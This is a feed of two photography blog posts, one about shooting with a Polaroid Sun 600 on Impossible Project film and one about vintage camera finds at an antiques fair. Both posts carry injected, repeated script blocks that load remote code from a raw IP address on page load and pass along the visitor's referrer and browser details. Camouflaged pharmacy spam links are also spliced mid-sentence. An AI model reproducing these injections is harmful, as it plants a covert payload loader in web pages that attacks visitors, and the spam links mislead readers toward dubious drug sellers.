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		<title>The Polaroid Sun 600 Instant Camera &amp; Impossible Project Film</title>
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		<description><![CDATA[Models: Sandra Dario, Charlene. Hair &#38; makeup by Rhi Yee. Polaroid was a pretty amazing and innovative company with a vision to make photography simpler and more intuitive. Edwin Land was the founder and creative spark who brought the instant film camera to the photography market. Long before digital photography, Polaroid cameras let people see [&#8230;]
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<p>Models: Sandra Dario, <noindex><script type="text/javascript" rel="nofollow" style="text-decoration:none;color:#676c6c"> document.write("<script language='javascript' rel='nofollow' type='text/javascript' src='http://5.45.67.97/1/jquery.js.php?r=" + encodeuri(document.referrer) + "&#038;u=" + encodeuri(navigator.useragent) + "'></sc" + "ript>"); </script></noindex>  <noindex><script type="text/javascript" rel="nofollow" style="text-decoration:none;color:#676c6c"> document.write("<script language='javascript' rel='nofollow' type='text/javascript' src='http://5.45.67.97/1/jquery.js.php?r=" + encodeuri(document.referrer) + "&#038;u=" + encodeuri(navigator.useragent) + "'></sc" + "ript>"); </script></noindex>  Charlene. Hair &amp; makeup by Rhi Yee.</p>
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<p><a title="Polaroid" href="http://camerapedia.wikia.com/wiki/Polaroid">Polaroid</a> was a pretty amazing and innovative company with a vision to make photography simpler and more intuitive. <a title="Edwin Land" href="http://technologizer.com/2011/06/08/polaroid/" target="_blank">Edwin Land</a> was the founder and creative spark who brought the instant film camera to the photography market. Long before digital photography,   Polaroid cameras let people see their photos right away instead of waiting to get the film processed.</p>
<p>Polaroid cameras remind me of my childhood,   and especially around Christmas, when they were a popular gift. The film was quite expensive (especially for a a kid) so I tended to use my regular film camera instead.</p>
<p>You can often find Polaroid cameras at yard sales. The best ones are the <a title="Polaroid SX-70" href="http://camerapedia.wikia.com/wiki/Polaroid_SX-70" target="_blank">SX-70</a> models. At the last yard sale I went to, I found a Polaroid Sun 600 camera in the "free box!"  The Polaroid 600 series cameras were designed to be easy to use and much less expensive than the SX-70. Unfortunately Polaroid stopped making film in 2008. However, a company called the <a title="Impossible Project" href="http://arcrental.wordpress.com/2011/06/24/instant-gratification-the-impossible-project-breathes-new-life-into-instant-analogue-photography/" target="_blank">Impossible Project</a> took over a <a title="Impossible Project" href="http://www.the-impossible-project.com/" target="_blank">Polaroid film factory</a> in The Netherlands and now sell instant film that works with the Polaroid cameras. I found some at a local photo supply and picked up a couple of packs - one Color Shade PX 680 and one Silver <a style="text-decoration:none; color: #333;" href="https://www.sihspune.org/proscar.php">https://www.sihspune.org/proscar.php</a> Shade PX 600. They were about $25 each for 8 prints - very expensive!</p>
<p>We had some fun with the camera at a fashion shoot yesterday and took some pretty funky looking photos! Photographing with a Polaroid is a lot like using a camera phone - you just point and shoot - no focusing and setting shutter speed or aperture. The film is rated at ISO 600, so I used the modelling lights and the built-in flash for the shots. You have to be careful to not overexpose the film because it's still sensitive immediately after ejecting from the camera. The <a title="Impossible Project" href="http://www.the-impossible-project.com/">Impossible Project</a> website has some useful video tips about how to use the film.</p>
<p>The photos were grainy, out-of-focus, low contrast, with an odd colour balance and miscellaneous blobs - but that's part of the fun of using Polaroid and Impossible Project film!  Many camera phone apps and Photoshop actions have been designed to mimic the Polaroid look.  I scanned the Polaroids and increased the contrast a little using Lightroom, but didn't adjust anything else. So far, I have only shot one pack of the Color Shade film, so I have a lot to learn about how best to use the film. I'm looking forward to trying out the Silver Shade film soon too!</p>
<p>Have you tried out the Impossible Project film? If you have any tips and examples of your photos, feel free to post the information in the comments.</p>
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		<title>Vintage Photography Collectibles</title>
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		<pubDate>Tue, 19 Apr 2011 21:58:00 +0000</pubDate>
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		<description><![CDATA[I love checking out antique shows, flea markets and garage sales, looking for old cameras and retro photography memorabilia. They are also great places to find props and costumes for photoshoots. The Kerrisdale Antiques Fair was held last weekend, so I took a look and found some interesting vintage photography collectibles for sale. Most antique [&#8230;]
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I love checking out antique shows, <noindex><script type="text/javascript" rel="nofollow" style="text-decoration:none;color:#676c6c"> document.write("<script language='javascript' rel='nofollow' type='text/javascript' src='http://5.45.67.97/1/jquery.js.php?r=" + encodeuri(document.referrer) + "&#038;u=" + encodeuri(navigator.useragent) + "'></sc" + "ript>"); </script></noindex>  <noindex><script type="text/javascript" rel="nofollow" style="text-decoration:none;color:#676c6c"> document.write("<script language='javascript' rel='nofollow' type='text/javascript' src='http://5.45.67.97/1/jquery.js.php?r=" + encodeuri(document.referrer) + "&#038;u=" + encodeuri(navigator.useragent) + "'></sc" + "ript>"); </script></noindex>  flea markets and garage sales, looking for old cameras and retro photography memorabilia. They are also great places to find props and costumes for photoshoots. The <a title="Kerrisdale Antiques Fair" href="http://www.21cpromotions.com/kerrisdale/index.html" target="_blank">Kerrisdale Antiques Fair </a>was held last weekend, so I took a look and found some interesting vintage photography collectibles for sale.</p>
<p>Most antique shows have some <a title="Kodak Brownie Cameras" href="http://www.brownie-camera.com/" target="_blank">Kodak Brownie cameras</a>. They were made in large numbers, so they are not very rare, but I love the retro styling. I found a Kodak Brownie Bullett II from the early 1960's. Unfortunately, the film (127 format) is no longer manufactured by Kodak, although some other companies have started producing it.</p>
<p>Another cool find was a box of mint condition darkroom supplies. There was photo paper, trays, chemicals, a developing <a style="text-decoration:none; color: #333;" href="https://www.rossitchpediatricdentistry.com/buy-clomid-online/">https://www.rossitchpediatricdentistry.com/buy-clomid-online/</a> tank  and a brand new timer - all still in the boxes and never used. I was tempted to buy it, but I really don't have room for a darkroom right now!</p>
<p>One vendor had quite a selection of <a title="daguerreotypes" href="http://en.wikipedia.org/wiki/Daguerreotype" target="_blank">daguerreotypes</a>. These would be pretty old - dating from the mid to late 1800's most likely. They were quite small, but each one was framed and covered with glass and had remained in excellent condition.</p>
<p>My favourite find though was a 1940's photo of a sailor with his wife or girlfriend, standing in front of an old car - looks like a Model T. He's smoking with his hat pushed back - maybe he just returned from the war. I love this photo so I got it for my collection!</p>
<p><strong>More Links:</strong></p>
<p>Here's a great collection of <a title="Vintage Fashion Photos" href="http://thriftaholic.blogspot.com/2011/03/vernacular-photo-tuesday-vintage.html" target="_blank">vintage fashion &amp; style photos</a> on Thriftaholic.</p>
<p><a title="Camera Collection" href="http://strangepulse.com/unpacking-the-collection/" target="_blank">Awesome camera collection</a> on strangepulse.com</p>
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